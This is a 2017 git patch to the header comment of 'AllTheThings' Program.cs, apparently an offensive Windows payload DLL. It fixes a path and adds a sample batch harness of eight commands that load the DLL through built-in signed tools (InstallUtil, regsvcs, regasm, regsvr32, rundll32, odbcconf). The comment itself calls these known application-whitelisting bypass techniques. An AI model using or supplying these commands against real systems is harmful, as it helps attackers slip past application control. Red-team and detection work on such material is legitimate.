From e4e892da8b5278ea56b3113e7c93e7d5e9a2ed12 Mon Sep 17 00:00:00 2001 From: caseysmithrc <30840394+caseysmithrc@users.noreply.github.com> Date: Thu, 30 Nov 2017 06:25:37 -0700 Subject: [PATCH] Updated All The Things --- Windows/Payloads/AllTheThings/Program.cs | 20 ++++++++++++++++++-- 1 file changed, 18 insertions(+), 2 deletions(-) diff --git a/Windows/Payloads/AllTheThings/Program.cs b/Windows/Payloads/AllTheThings/Program.cs index 261f27dd..71298edf 100755 --- a/Windows/Payloads/AllTheThings/Program.cs +++ b/Windows/Payloads/AllTheThings/Program.cs @@ -30,7 +30,7 @@ Includes 5 Known Application Whitelisting/ Application Control Bypass Techinique Usage: 1. x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll - x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll + x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll 2. x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll @@ -45,10 +45,26 @@ Usage: rundll32 AllTheThings.dll,EntryPoint 6. - odbcconf.exe /a { REGSVR AllTheThings.dll } + odbcconf.exe /s /a { REGSVR AllTheThings.dll } 7. regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThings.dll + + +Sample Harness.Bat + +[Begin] +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll +regsvr32 /s /u AllTheThings.dll +regsvr32 /s AllTheThings.dll +rundll32 AllTheThings.dll,EntryPoint +odbcconf.exe /a { REGSVR AllTheThings.dll } +regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThings.dll +[End] + + */ [assembly: ApplicationActivation(ActivationOption.Server)]